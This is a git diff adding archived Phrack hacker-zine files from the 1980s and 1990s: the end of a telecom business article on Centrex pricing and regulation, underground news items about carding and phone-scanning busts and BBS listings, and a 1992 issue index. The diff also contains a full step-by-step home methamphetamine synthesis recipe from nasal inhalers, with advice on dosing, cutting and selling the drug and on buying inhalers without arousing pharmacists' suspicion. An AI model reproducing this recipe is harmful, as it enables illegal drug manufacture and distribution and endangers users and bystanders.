+trunk  equivalency  rates  do not  undermine  its  access  charge
+policy. and the lower rates for Centrex users remain in effect.
+     Beyond whittling down customer access line charges, a number
+of  BOCs  have  had  fresh  Centrex  tariffs  approved  by  state
+commissions  that  chop the service's rates and offer  innovative
+pricing schemes.   Bell Atlantic's BOCs,  for instance,  have won
+approval for tariffs cutting Centrex rates 30% to 35%.   "The net
+effect,"  said  Lakin,  "is that it is a  very  price-competitive
+entry."
+     To  NATA,  the service's price competitiveness  arises  from
+the  BOCs'  continuing  monopoly position in  the  local  market,
+although  BOC officials state firmly that Centrex is  not  priced
+below  cost and,  in fact,  generates revenue to subsidize  other
+services.
+     According to Angel,  a Washington, D.C. residential customer
+pays  a cost-justified rate of between $15 and $17 for the  local
+loop and central office switching capability.  A Centrex customer
+using  an  identical  local loop connected to  the  same  central
+office pays only $12.  Many of the new tariffs being filed by the
+BOCs   recognize   two   of  Centrex's   traditional   headaches:
+instability and distance sensitivity.
+     Now many of the new tariffs offer users price guarantees and
+incentives   for  signing  the  long-term  contracts  that   give
+telephone companies some stability in their Centrex base.
+     By  locking in rates and either capping the associated costs
+or  typing their increase to the Department of  Labor's  cost-of-
+living index,  BOCs have been able to offer customers much of the
+same predictability that a PBX does.  Most tariffs give customers
+the  choice  of  three-,   five- or  seven-year  contracts,   the
+incentives rising with the length of the agreement.
+     Centrex  customers in the Chicago Loop area,  for  instance,
+were paying a $12.52 per-line monthly charge if their system used
+250  lines.   Under a tariff approved last fall,  however,  those
+customers  saw the monthly charge drop to $10.94 and could  drive
+it  down even further by signaling  long-term  contracts:  $10.09
+per-line  under a three-year agreement,  $9.84 under a  five-year
+agreement and $9.54 under a seven-year agreement.
+     "Slightly  less than half of our 400,000-line total base has
+gone  on contract," said Lee Armagost,  Illinois Bell's  division
+manager  for  tariffs and costs.   And the  concepts  success  is
+continuing."
+     For all of the BOCs' success in winning lower Centrex rates,
+some  companies  have  fared even better -- they  have  convinced
+state  regulators to detariff Centrex service for  new  customers
+and, in one case, to deregulate it entirely.
+     Northwestern Bell seems to be the  current  detariffing  and
+deregulating  champion among the BOCs,  having won  approval  for
+detariffed  Centron  service  in all of its states  except  Iowa.
+Iowa simply deregulated it.
+     While detariffing allows the BOCs more freedom to  negotiate
+with   large  Centron  customers,   deregulating  takes   Centron
+assets,  expenses  and  revenues right out of the rate  base  and
+removes the service from the regulators purview.
+     According  to Tom Smith,  vice-president and chief executive
+officer  of  Northwestern Bell Iowa,  the  company's  first  move
+toward  deregulation  occurred in  1983,   when  the  Iowa  State
+Legislature   passed   a  Bell-inspired  bill  that  called   for
+competitive  services  to be  deregulated.   The  following year,
+Northwestern   Bell   succeeded  in  getting  in   getting   more
+legislation  passed  that declared Centron ready for  detariffing
+because of its competitive nature.
+     After  reviewing  the  legislature's  actions,   the   State
+Commerce  Commission decided that if the lawmakers were convinced
+Centrex was competitive and services were to be  deregulated,  it
+would  skip over the detariffing of Centrex and simply deregulate
+it, Smith said.
+     What  followed  was  what  Smith  called  "nine  months   of
+intensive work," as regulators, company officials and consultants
+from Anderson & Co. sorted out the procedures for carving Centrex
+away  from  the  rate base and set up safeguards  against  cross-
+subsidies.
+     "A  central  office  is not something that has  this  little
+compartment that says 'for service A' and that little compartment
+that says 'for service B'" Smith said of the accounting problem.
+     NATA  agrees with that description and,  according  to  NATA
+attorney Angel,  argues that because competitive Centrex services
+must operate commingled with regulated facilities, the FCC should
+halt  the detariffing and deregulating of the service or order it
+to be sequestered in a separate subsidiary with other competitive
+products.
+     But the FCC has not acted on NATA's  complaint.   Meanwhile,
+the  first customer has signed up for Iowa's deregulated  Centron
+-- the state of Iowa itself.
+     The  state  had solicited bids to replace its  Capitol  Hill
+complex's  Centrex service in Des Moines when deregulated Centron
+became available.   The new rates negotiated by Northwestern Bell
+and the state's staff produced a savings of about $1 million  for
+the state over the three-year life of the contract,  according to
+Glen Anderson Jr., director of state communications for Iowa.
+     While Anderson called the deregulated Centron service prices
+"a  dramatic savings," he also pointed out another incentive  for
+signing up.
+     "The other factor was political," he said.  "We did not have
+an appropriation to proceed with the procurement of a switch."
+     When  the Centron agreement runs out,  the state will be  in
+the  market for a PBX again.   A member of Anderson's staff  said
+the  staff remains convinced it can enhance its own program  with
+its own switch.
+     At  some BOCs,  the once feature-poor Centrex has caught  up
+with  PBXs  in  many respects.   Where  telephone  companies  are
+pushing  digital capabilities onto their networks, they are  also
+pushing  digital capabilities onto Centrex.   Pacific  Bell,  for
+instance,  can  offer fully digital Centrex service from many  of
+its metropolitan central offices.
+     A  number of BOCs concur with Bell Atlantic's position  that
+digital  Centrex  is a natural rung on the ladder to an  ISDN  --
+among  them  Pacific Bell and New York Telephone  Co.   Many  are
+upgrading  Centrex service with PBX-like features short of  fully
+digital service, including several versions call forwarding, call
+waiting  and speed dialing.   Given the current strictures in the
+FCC's  Second Computer Inquiry and the Modified Final  Judgement,
+the expanded features list was bound to be called into question.
+     NATA,  which has been leading the charge against the changes
+in Centrex service,  is fighting its battle on four fronts at the
+FCC:
+     1)  Last  fall,   it  asked  the  FCC  either  to  halt  the
+detariffing and deregulation of Centrex by the states or order  a
+separation  of commingled facilities.   The FCC has not acted  on
+the complaint.
+     2)  Soon after filing that complaint,  NATA filed another --
+this  one  questioning  the provision  of  competitive,  enhanced
+features by a regulated,  basic telephone company.  The FCC acted
+on  that complaint last summer,  deciding that features  such  as
+speed  dialing,  call forwarding and customer station changes are
+adjuncts  to  basic  service and can be offered  by  a  regulated
+telephone  company  under  Computer  II.    Only  customer-dialed
+account recording was found to be and enhanced service,  but  the
+BOCs can request waivers to continue offering it.
+     Until  the  waiver  requests are  considered,  the  FCC  has
+granted  immediate,  temporary  waivers so the BOCs can  continue
+providing customer-dialed account recording to existing customers
+-- including the U.S.  Army.   Meanwhile,  the BOCs and NATA  are
+seeking  reconsideration of  the FCC's decision in petitions  the
+FCC  will address this month or next,  according to the FCC staff
+member handling the issue.
+     3)  Late last year,  NATA asked the FCC to to stop Ameritech
+and Nynex Corp.  equipment subsidiaries from selling basic  phone
+services,  including Centrex,  through their unregulated customer
+premises equipment subsidiaries.
+     When the FCC agreed to permit the joint marketing, it did so
+with  the provision that non-Bell companies would also be  signed
+up  as sales agents for the basic services.   As evidence of  the
+problem,  NATA  pointed  to the sparse number of  non-Bell  sales
+agents  being  signed up and the revenue moving from the BOCs  to
+their sister customer premises equipment subsidiaries in the form
+of sales commissions.   The FCC has not acted on the complaint or
+NATA's  original petition seeking a reversal of the  sales  agent
+decision.
+     Bell Atlantic,  backed by the majority of RBOCs,  is seeking
+FCC  permission  for  an  inverted version  of  the  sales  agent
+decision  that  would let Bell Atlantic serve as sales agent  for
+another  vendor's  customer premises  equipment  when  submitting
+Centrex bids.
+     4)   In  July  1985,   NATA  filed  an  even  more  sweeping
+complaint,  a  Centrex  pricing action that argues that the  BOCs
+are  using  their  monopoly power to  favor  Centrex  over  other
+customers and to the detriment of PBX suppliers.
+     The  complaint bridges a number of issues,  including  trunk
+equivalency  rates,  pricing below cost and Computer II concerns.
+The BOCs argued that Centrex is a state concern and, although the
+FCC  has preempted state jurisdiction in other matters,  the  FCC
+paused  to  consider the jurisdictional question -- a pause  that
+could  last  six months or extend  "indefinitely,"  according  to
+lawyers working on the matter.
+     NATA  attorneys do not seem daunted by the chilly  reception
+they've  gotten at the FCC,  apparently expecting the temperature
+to  rise  as  regulators worry less about the  viability  of  the
+divested BOCs and begin to examine the economics of Centrex.
+     "All  rates  apart  from Centrex  are  rising  dramatically.
+Centrex  rates are decreasing," NATA attorney Angel  said.   "The
+BOCs  would have you believe that Centrex provides a  subsidy  to
+other services.   But,  in fact, documented studies show just the
+opposite, that Centrex derives a subsidy."
+     If  Centrex  is  priced  below cost,  why are  the  BOCs  so
+delighted with it?   According to Angel,  the answer lies in  the
+financial  structure of a regulated utility.   "Centrex uses many
+more  loops  than  necessary.   This leads  to  new  construction
+budgets,  which lead to new investment,  which leads to a rate of
+return  for the investors."  Investors,  Angel added,  "make make
+money by putting loop and plant all over the place."
+     NATA's objections to the recent changes in Centrex rates and
+services,   objections  that  do  not  extend  to  opposition  to
+traditional  Centrex,  have generally been characterized  by  BOC
+officials  and regulators as protectionist actions taken by a PBX
+industry  that   did   not  really   want  the  full  competitive
+environment for which it clamored.
+     "NATA  is frequently described as the whiner in the  corner,
+as though it holds all the cards," Angel said.   The seven  RBOCs
+are  far  better  financed,   he  added,  yet,  "they  have  been
+successful in painting themselves as the underdogs."
+
+* Note:  Leslie Albin is a freelance writer based in Chevy Chase,
+Maryland.
+
+Watch  for  Part  1 of  Centrex  Renaissance:  "The  Technology".
+Written by John D. Bray.
+
+     The above text was written primarily for people in marketing
+telephone technologies.  In  the interest of the phreaking world,
+I   hope   that   you  can  focus  on  the   business   side   of
+telecommunications  which may be in your future.   There are more
+to  PBX's  than  0-700-456-1001.   Any  comments,  questions,  or
+corrections can be e-mailed to me at Metal Shop Private, or to:
+
+                            J. Sluggo
+                           P.O. Box 93
+                    East Grand Forks, MN 56721
+
+This  file  is  dedicated to Bambi for  bringing  me  my  fondest
+memories -- There is "No One Like You!" -- The Scorpions.
+
+ /
+ \
+ / luggo !!
+
diff --git a/phrack4/8.txt b/phrack4/8.txt
new file mode 100644
index 0000000..9a7fe6c
--- /dev/null
+++ b/phrack4/8.txt
@@ -0,0 +1,143 @@
+                    Volume One, Issue Four, Phile #8 of 11
+
+                              THE TRIED AND TRUE
+                          HOME PRODUCTION METHOD FOR
+                               "METHAMPHETAMINE"
+
+
+
+
+Also known as:"CRYSTAL","METH","CRANK","SPEED" etc..........
+
+Written and tested by: The Leftist.
+
+Have you ever heard of speed? No, not those little pills that are shaped like
+hearts, not black beauties, or magnum .357's, but real crystal.  This is the
+exact drug that Hitler used on his troops in WWII to make them fight for days
+on end.  This is the drug, that in the 60's, caused a "smack" uproar in New
+York's "Needle Park".  Now, you can make this very same drug, in your own
+dangerous kitchen, safely and easily.  Once you do this a few times, you will
+get the hang of it.  I no longer have to read the directions to produce it.
+
+What to do with it once you have made it.
+-----------------------------------------
+Take a ball about the size of a lead pellet, and wrap it in tissue, and
+swallow, or you can put it in capsules and use it.  You can smoke it, mix it
+with vitamin B-12, and snort it like cocaine.  You can also sell it, for about
+$65-70.00 a gram, and don't forget to cut it.  Remember, this is pure stuff!!
+
+===============================================================================
+
+
+List of chemicals and materials
+-------------------------------
+
+Dilute Hydrochloric acid-->  This may be purchased at the hardware store.  It's
+sold as a brick and driveway cleaner.  They call it muriatic acid.
+
+Sodium Hydroxide--> This, you probably already have. It's called "lye" at most
+places; it's drain cleaner.
+
+ Ethyl Ether--> You'll probably have to make this.  Don't worry, it's a breeze.
+Just go to your local K-mart or Auto parts store, and get a can of that
+"STARTING FLUID" it comes in a spray can.  It's used for cold weather starting
+of gasoline engines.
+
+"VICKS" nasal inhalers-->USE ONLY VICKS!! No other kind will work that I know
+of.  These are at any drug store or grocery, etc..  You need 12 of em, but
+don't buy em' by the dozen, unless its winter time, then you can just say yer
+from some nursing home, and you're stockin up for the patients.  Otherwise buy
+em' 2 at a time, if possible.  Get a friend to help you.  The druggists at the
+drug store usually will know what's goin on if you buy quantity.
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+                            LIST OF EQUIPMENT
+                            -----------------
+
+ Two large eyedroppers- ten small glass bottles- one large glass or porcelain
+bowl- coffee filters- one small jar with a top- one Pyrex baking dish- one
+glass test tube.
+
+-------------------------------------------------------------------------------
+                        -==*(> N O T I C E <)*==-
+
+PLEASE! DON'T SMOKE IN THE SAME ROOM WHEN YOU DO THIS.
+OPEN A WINDOW IN THE ROOM IF POSSIBLE.
+FOLLOW THESE INSTRUCTIONS EXACTLY.  THIS RECIPE HAS BEEN TESTED AND THIS IS THE
+BEST WAY TO DO IT.  DON'T TAKE SHORTCUTS, AND DON'T EVEN START TO DO THIS
+UNLESS YOU HAVE ABOUT 3 HOURS SPARE.
+-------------------------------------------------------------------------------
+                            PREPARING ETHER!
+(DO THIS FIRST)
+
+Take one of the small bottles and spray starter fluid in it till it looks
+half-full.  Then fill the rest of the way with water, cap the bottle and shake
+for 5 minutes.  Then, draw off the top layer with the eyedropper, and throw
+away the water layer.  Repeat this until you have about 3 oz. of ether.  Put
+the cap on it, and put it in the refrigerator if you can.  (If you can't, don't
+worry about it) You'll use this in the procedure below.
+
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+
+                  THE TRIED AND TRUE HOME PRODUCTION METHOD
+
+(1) Break open the inhalers, a pair of real sharp scissors does this good.
+Place the cottons that were inside in a jar and close the lid.  (Remember you
+use all 12 cottons.)
+
+(2) In the bowl, combine 1- 1/3 oz. water and 2/3 oz. muriatic acid.  Shred
+cottons in this solution, and knead for 5 minutes with hands.  (ALWAYS BE SURE
+THERE'S CLEAN RUBBER GLOVES on your hands.) You can do it bare-handed if you've
+got tough skin.  Squeeze all juice out of filters after you knead, and throw
+em away.
+
+(3) Filter the remaining liquid into the quart jar.  It will be necessary to do
+this several times to get that awful smelling oil out.  The chemicals in the
+inhalers have been bonded to the HCl, and the oils have been filtered off.
+Throw the filters away.
+
+(4) Pour enough of the solution into a small bottle to fill it 1/3 full.  Save
+any leftover juice for the second batch.
+
+(5) Pour 1/4 teaspoon of the lye crystals into the bottle and agitate.  Do this
+carefully, as the mixture will become hot, and give off a gas.  Repeat this
+step until the mixture remains cloudy.
+
+(6) Fill the bottle from step (5) up the rest of the way with ether. Cap the
+bottle, and agitate for about 8 minutes.  It is very important to expose every
+molecule of the free-base to the ether for as long as possible.
+
+(7) Let the mixture settle.  There will be a middle layer that is very thick.
+Tap the side of the bottle to get this layer as thin as possible.
+
+(8) Remove the top layer with the eyedropper, being careful not to get any of
+the middle layer in it.  Save the top layer, and throw the rest away.
+
+(9) Fill a bottle half-way with water, and about 10 drops of acid.  Pour the
+top layer from step (8) into the bottle, and cap it.  Shake the bottle for 2
+minutes.  When it settles, remove the top layer and throw it away.  The free
+base has now been bonded to the HCl/water mixture.
+
+(10) If there is anything left from step (3), repeat the procedure with it.
+
+(11) Evaporate the solution in the Pyrex dish on low heat.  You can do this on
+the stove, but I have found that if you leave it on top of a hot-water heater
+(like the one that supplies hot water to your house) for about 2-3 days, the
+remaining crystals will be Methamphetamine.
+
+ Some notes:
+
+Police are now calling this the "New Cocaine".
+
+It is very easy to become delirious off the ether fumes, so be sure you are
+well ventilated, I mean it!!!
+
+Small, aspirin, or experiment bottles seem to work the best for smaller
+batches.  The measurements are not exact, so you don't have to be either.
+
+In step 9, be sure you don't use too much water.  Remember, this is the water
+you have to use to evaporate.
+
+
diff --git a/phrack4/9.txt b/phrack4/9.txt
new file mode 100644
index 0000000..9524e2d
--- /dev/null
+++ b/phrack4/9.txt
@@ -0,0 +1,315 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Four, Phile #9 of 11
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                  ///\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\\
+Metal Shop PRIVATE\\\  Phrack World News Issue 3 Part 1  ///_  _       _______
+Metal Shop AE      \\\                                  ///| \/ |     / _____/
+Metal Shop Brewery  \\\           Compiled by          /// |_||_|etal/ /hop
+                     \\\                              ///  _________/ /
+Present PWN III       \\\///\\ Knight Lightning //\\\///  /__________/
+---------------              \-^^^^^^-^^^^^^^^^-/             Triad
+_______________________________________________________________________________
+
+MCI Working With BOCs
+---------------------
+PacBell and MCI have combined forces to make the Security Pacific Data
+Transmission Corporation.  Also it has been announced that field trials are
+currently being held for Project Victoria: an integrated voice-data-video
+service for homes and small businesses.
+
+BOC stands for Bell Operating Company, and it refers to the small companies
+that were formed after the breakup of AT&T.
+_______________________________________________________________________________
+
+2600 Magazine Vs. Computel                         Wednesday, February 26, 1986
+--------------------------
+The following post was seen on Stronghold East Elite on the above date.
+-------------------------------------------------------------------------------
+We're seriously thinking of taking some action against those nasty people at
+Computel.  We published a letter this month which implied that the whole
+operation was really a fairly sophisticated FBI scam.
+
+We need to know as many facts as possible. Please contact us on Stronghold East
+thru e-mail, in person, or call (516) 751-2600.  If we're not around, leave a
+message saying when you'll call back and we'll try to be there.
+
+Tell us if you've had personal experience with Computel or if you know others
+who have. If anyone has cancelled checks or the equivalent, let us know!
+
+Also, if anyone can send us a Computel ad, which somehow everyone here at 2600
+managed to miss, it would be helpful. Send that to:
+
+                                     2600
+                                   PO Box 99
+                            Middle Island, NY 11953
+
+Note: That's not our subscription address.  Subscriptions are at PO Box 752.
+
+We may not be able to get these people prosecuted, but we can sure raise one
+hell of a stink trying.
+
+                                    2600/eg
+
+Let it be said that hackers and phreaks will never stand aside
+and be ripped off!
+-------------------------------------------------------------------------------
+At this time we at Phrack have been able to uncover nothing more about the
+Computel situation.
+                      Information provided by (of course)
+
+                                 2600 Magazine
+_______________________________________________________________________________
+
+Mister Carding Busted
+---------------------
+Mister Carding first started in the profession of which his name comes forth in
+the summer of 1984.  Since then he has accumulated roughly $45,000 worth of
+merchandise.
+
+He was caught once before in the summer of 1985 by Federal agents.  However, as
+the investigation went on, they didn't have enough material and dropped the
+charges.
+
+Somewhere around the fourth week of February he was caught again, this time by
+local authorities.  Here is how it all started:
+
+"Two months ago, I had tons of stuff coming in and had another guy picking it
+up.  One night two weeks or so ago I had him go out to pick up a 20 meg 3 1/2
+inch hard drive.  It was only the second time I had used that place as a drop
+spot.  Unfortunately, he walked right into a police stakeout and he was
+followed, first to my house and then to his own."
+
+The next day the police went to the house of the friend and arrested him.  He
+willingly signed an affidavit stating that Mr. Carding was the mastermind
+behind the whole operation and that he was just an accomplice.
+
+The court date has not yet been set but his crimes are as follows:
+
+-  Fraudulent use of a credit card.
+-  Possession of stolen merchandise in excessive amounts.
+-  Computer Invasion (Hacking).
+
+On March 6, 1986:
+
+- The police confiscated his modem.  It had been carded.
+- He had a meeting with the detectives, in which he had to take a lie detector
+  test.  They asked him if he was lying about any part of the case, if he
+  hacked into computers, and if he was using one specific person's card.
+- He failed the test.
+
+The police believe he hacked into the computer of a bank in New Jersey, Mr.
+carding denies all of it.  However it is the truth.
+
+Most people didn't know it but Mr. Carding was one of the better hackers around
+and should be remembered.
+
+He is pleading innocent to all charges and has signed a reverse affidavit
+stating that the other guy was the mastermind.
+
+He, as of this writing, has not been arrested but expects to have full charges
+brought on him within the next week.
+
+                    Information provided by Mister Carding
+_______________________________________________________________________________
+
+Boston Strangler Caught Scanning
+--------------------------------
+The Boston Strangler was caught scanning, he wasn't scanning an extender, he
+was scanning a prefix in his home town. The phone company shut his line off and
+now Boston Strangler may have to go to court, he claims he is under 1XB but
+this is doubtful.
+
+An employee of the phone company actually called him and told him to not use
+the phone because his supervisor was checking for trouble on the line.
+Apparently Boston Strangler scanned the entire prefix and once he was finished
+the phone company called and said that he was in a lot of trouble.
+
+                        Information provided by taRfruS
+_______________________________________________________________________________
+
+AT&T Suing The BOCs
+-------------------
+American Telephone and Telegraph is allegedly filing an 80 million dollar
+lawsuit on the Bell Operating Companies.  They filed a complaint with the FCC
+in January 1986 that claims that certain BOCs owe AT&T 80 million dollars
+because they failed to perform specific duties which were part of their billing
+and collection contracts.
+
+It is not known how much each company owes with the exception of Northwestern
+Bell who owes $2 million.
+
+                     Information provided by Jester Sluggo
+_______________________________________________________________________________
+
+Speed Demon Elite; Will It Return?
+----------------------------------
+The rumors are true, Radical Rocker did forget to pay his phone bill, and as a
+result Speed Demon Elite was shut down.
+
+Any talk about SDE being busted for having credit card information on the board
+should be ignored as it is completely false and only one phreak's
+interpretation of past events.
+
+Radical Rocker has stated that everyone should expect Speed Demon Elite to
+return in the near future.
+
+                               Speed Demon Elite
+                                 415-522-3074
+
+                    Information provided by Radical Rocker
+                Thanx to Investigative Reporting by Taran King
+_______________________________________________________________________________
+
+Private Sector Damaged/Returning
+--------------------------------
+The Private Sector, which was supposed to have been returned by the 16th of
+February, 1986 had been damaged in the hands of the authorities.  According to
+them, "one of the cards blew up."  They say that this happened before they had
+the chance to erase the two "illegal" files they found on the hard drive.  So
+now then they had to hold onto it a bit longer.  Naturally 2600 Magazine
+suspected intentional foul play and stepped up the pressure on them to return
+Private Sector. 2600 suspected the card they authorities were referring to was
+the hard disk controller. They wouldn't stick another controller from another
+machine in and they wouldn't let 2600 Magazine even look at the machine.  What
+an outrage!
+-------------------------------------------------------------------------------
+On Friday, February 28, 2600 Magazine announced the following.
+-------------------------------------------------------------------------------
+Private Sector has finally been returned, and is in the process of being
+repaired.  It will be back up in the near future at the same number as before;
+201-366-4431.  Call 2600 Magazine at 516-751-2600 for more details.
+
+At the current writing of this article, Private Sector is up and running.  Only
+time will tell if it will ever be the great bbs it once was.
+
+                     Information provided by 2600 Magazine
+_______________________________________________________________________________
+
+TelePub'86
+----------
+The 1986 TelePub meeting (originally planned up by Sigmund Fraud) was held on
+the second floor of the Days Inn Hotel at 440 W.57th St. New York, NY.
+Supposedly the first Telepub meeting since 1980, when one was held in
+Washington DC.  The meeting room was called by some "The Colosseum."
+
+There was a $10 admission fee to the meeting room.  Supposedly Chesire
+Catalyst's girlfriend (who some said was blind and had a seeing eye dog) was
+collecting the money and handing out the name tags.
+
+Some say there were about 25-30 people there in total, but Broadway Hacker
+stated that there was only 23.  This included:
+
+Broadway Hacker
+Chesire Catalyst + girlfriend
+Dr. PHATE (P>hreaks H>ackers A>nd T>elecom E>nthusiasts)
+Karl Marx
+Lou Dolinar (reporter from Newsday Magazine in Long Island)
+Ninja NYC
+Private Sector + girl (Incidentally the programmer of the NEW Private Sector
+                       BBS)
+Sammy Junkins
+Scan Man
+Sigmund Fraud + friend
+Slave Driver
+The Bootleg
+The Cracker
+The Lineman
+2600 Magazine - Tim and Paul
+
+Most noted for not showing up were TUC and TWCB Inc.  Since this meeting was
+generally supposed to be about the revival of TAP Magazine, it was VERY
+surprising to some that TWCB didn't go. To others however, this was expected.
+
+Their reason (excuse) has something to do with late plane arrivals and legal
+problems (probably dealing with restrictions due to their probation. Supposedly
+TUC's phone number was posted on the board at the front of the meeting room for
+those who wanted to get in touch with him.
+
+There was basically chit chat until around 11:15 am when Chesire Catalyst began
+talking about CCIS (Common Channel Inter-Office Signaling).  His speech really
+told nothing new but the best part of the discussion came out of the many
+questions that were asked by the audience. Also around 11:15 is when Tim and
+Paul from 2600 Magazine showed up.
+
+A little later, Scan Man and The Bootleg started to discuss the possibilities
+of satellite phreaking, and up & down linking.
+
+A little later, Private Sector appeared and with him came an ad from Personal
+Computing Magazine.  The ad was from none other than Computel.  Computel, the
+supposed and almost definite fed operation magazine was discussed for quite a
+long time.
+
+Chesire Catalyst began to distribute the final issue of TAP.  It was issue #91,
+Spring 1984.  It included articles about credit agencies and UNIX, from BIOC;
+Hacking Western Union, by TUC; Phreaks and hackers Morality, by Big Brother;
+Passport check sums, and Bell Pie, among others.
+
+2600 Magazine gave out their latest issue, February 1986, Volume 3 Number 2 as
+well as other promotional items.
+
+Sigmund Fraud was giving out older issues of TAP.
+
+Among other things, BBS numbers were passed and there were all sorts of
+telecommunication magazines lying around.
+
+There was a break for lunch.  When they returned Scan Man started in on Chesire
+about the money that MANY had sent in to TAP and never received the magazine or
+their money back.  Chesire replied, "It went to pay my bills."  He also made
+other remarks about how he hasn't spent it all and how he may send it back but
+he really didn't ever answer the questions that Scan Man put to him.
+
+       Much of this information came from Slave Driver and Sigmund Fraud
+_______________________________________________________________________________
+
+Metal Shop Brewery
+------------------
+There is a NEW member to the Metal Shop family, thus completing the Metal Shop
+Triad.
+
+      Announcing...
+                               _  _        _______
+                              | \/ |      / _____/
+                              |_||_|etal / /hop
+                              __________/ /
+                             /___________/
+ _______   ________    ________   __        __   ________   _______    __   __
+/  ___  \ /   __   \  |   _____| |  |      |  | |   _____| /   __   \ |  | |  |
+| |___| | |  |__|  |  |  |__     |  |  __  |  | |  |__     |  |__|  | |  |_|  |
+|       / |   _   _/  |     |    |  | |  | |  | |     |    |   _   _/ \_     _/
+|  ___  \ |  | \  \   |   __|    |  |_|  |_|  | |   __|    |  | \  \    \   /
+| |___| | |  |  \  \  |  |_____  |            | |  |_____  |  |  \  \    | |
+\_______/ |__|   \__\ |________| \____________/ |________| |__|   \__\   |_|
+
+                                 314-DWI-8259
+
+               300/1200 Baud, No Parity, 8 Data Bits, 1 Stop Bit.
+
+Sysop: Beer Wolf
+Co-sysop: Cheap Shades
+-------------------------------------------------------------------------------
+ System Configuration:
+
+-  IBM PC with 2 Half Height Teac 360k Floppy Drives
+-  20Meg MiniScribe Hard Drive
+-  Hayes SmartModem 1200
+-  Epson LQ-1500 Printer
+-  Total of 448k of RAM and expecting 2 Meg soon
+-------------------------------------------------------------------------------
+While Metal Shop Brewery is mainly an IBM Pirate Board, it also has interesting
+message bases.
+
+Some of them include these topics:
+
+- New Users
+- Bulletin Boards
+- General Schtuff
+- Programming
+- Things that go BOOM! (Anarchy)
+- Hacking
+- Phreaking
+-------------------------------------------------------------------------------
+Metal Shop Brewery is run on DoubleDos and is a strong supporter of Phrack
+Newsletter.  IBM Pirates Call Today!
+_______________________________________________________________________________
+
diff --git a/phrack40/1.txt b/phrack40/1.txt
new file mode 100644
index 0000000..e2ccafc
--- /dev/null
+++ b/phrack40/1.txt
@@ -0,0 +1,121 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 1 of 14
+
+                                 Issue 40 Index
+                              ___________________
+
+                               P H R A C K   4 0
+
+                                 August 1, 1992
+                              ___________________
+
+                              ~ Baby's Got Back! ~
+
+Welcome to the special 40th Anniversary issue of Phrack Magazine!  A month
+later, we are just barely recovering from the fun at the amazingly successful
+SummerCon '92.   It was the largest turnout ever seen at a SummerCon and the
+full details can be found in a special report by Knight Lightning and myself
+with help from Holistic Hacker and Dr. Williams.
+
+Brian Oblivion, whose name is regularly seen in the pages of Phrack returns
+with part two of his file on Cellular Telephony (part one seen in Phrack 38).
+Also relating to telephones in this issue is "The Fine Art of Telephony" by
+Crimson Flash.  This equally in depth and detailed file focuses of RC/MAC,
+FACS, and MARCH.
+
+Even though the arrogant bastards at Southwestern Bell and BT Tymnet boast
+about their great security, it appears that they had almost nothing to do with
+the tracking down and apprehension of the MOD in New York.  As a few of us
+already know, MOD was brought in by hackers.  Gee, imagine that.
+
+I'm not going to play politics and make judgments about this, instead I'll let
+you read all about it in Phrack World News, Part 2 and then you can draw your
+own conclusions.
+
+Since we're on the subject of Tymnet, I felt it appropriate <grin> to include
+3 articles on the subject by Toucan Jones.  A special "kissy, kissy" to Dale
+Drew (aka The Dictator aka Blind Faith aka Bartman) for his help and assistance
+in getting us this valuable information.  Could a file on TRW be 'round the
+corner?  Hmmmmmm could be. :-)
+
+Starting with this issue, Mind Mage will be assisting with Phrack Loopback as
+our Technical Advisor.  He will handle questions regarding technical problems
+both for publication or for private response.  Feel free to send your questions
+to phracksub@stormking.com and they will be forwarded and answered.
+
+This issue's Loopback has a very special message from Jester Sluggo as he
+gives notice of his official retirement from the hacking community.  Sluggo
+remembers the past and give advice about the future; I continue my pursuit on
+the so-called professionals in the anti-virus community and exposes their real
+agenda; and, Sarlo takes us on a tour of the 1992 Consumer Electronics Show in
+Chicago and there is lots more.
+
+The Racketeer (Rack of The Hellfire Club) takes the reigns of the continuing
+Network Miscellany column and Rambone returns with the latest on what is
+happening in the underground world of computer software traders in Pirates
+Cove.
+
+Taran King is back for a special Phrack Pro-Phile with Lex Luthor, the founder
+of the Legion of Doom and perhaps the most legendary underground hacker ever.
+
+           "If it's older than a week, then we won't have it online."
+
+You are invited to check out a great new BBS called Planet 10.  If you have
+half a brain, you might even get access.  Planet 10 is run by Control C and
+features messages and xfers that are timed to expire after 1 week maximum.
+Give it a call at (313)683-9722.
+
+
+                         "Phrack is a bad influence..."
+                             -- TriZap, July 1992  :-)
+
+
+                            DISPATER, Phrack Editor
+              <phracksub@stormking.com> or <phrack@well.sf.ca.us>
+
+
+      Editor-In-Chief : Dispater
+       Eleet Founders : Taran King and Knight Lightning
+ Technical Consultant : Mind Mage
+   Network Miscellany : The Racketeer [HFC]
+         Pirates Cove : Rambone
+                 News : Datastream Cowboy
+          Photography : Restricted Data Transmissions
+            Publicity : AT&T, BellSouth, and the United States Secret Service
+    Creative Stimulus : Camel Cool, Jolt Cola, and Taco Bell
+              Shampoo : Mudge
+        Other Helpers : Apollo, Brian Oblivion, Control C, Dr. Williams,
+                        Dokkalfar, The Gatsby, Gentry, Guido Sanchez, Holistic
+                        Hacker, Jester Sluggo, Legacy Irreverent, Lex Luthor,
+                        Mr. Bigg, Nihil, The Omega, The Pope,.The Public,
+                        Sarlo, TriZap, Tuc, Voyager, and White Knight
+
+                         We're Back and We're Phrack!
+
+               "Phrack.  If you don't get it, you don't get it."
+
+   "Whaddya mean I don't support the system?  I go to court when I have to!"
+
+
+                                -= Phrack 40 =-
+
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by Dispater                                               06K
+ 2. Phrack Loopback by Dispater and Mind Mage                              50K
+ 3. Phrack Pro-Phile on Lex Luthor by Taran King                           36K
+ 4. Network Miscellany by The Racketeer [HFC]                              32K
+ 5. Pirates Cove by Rambone                                                57K
+ 6  Cellular Telephony, Part II by Brian Oblivion                          72K
+ 7. The Fine Art of Telephony by Crimson Flash                             65K
+ 8. BT Tymnet, Part 1 of 3 by Toucan Jones                                 57K
+ 9. BT Tymnet, Part 2 of 3 by Toucan Jones                                 55K
+10. BT Tymnet, Part 3 of 3 by Toucan Jones                                 91K
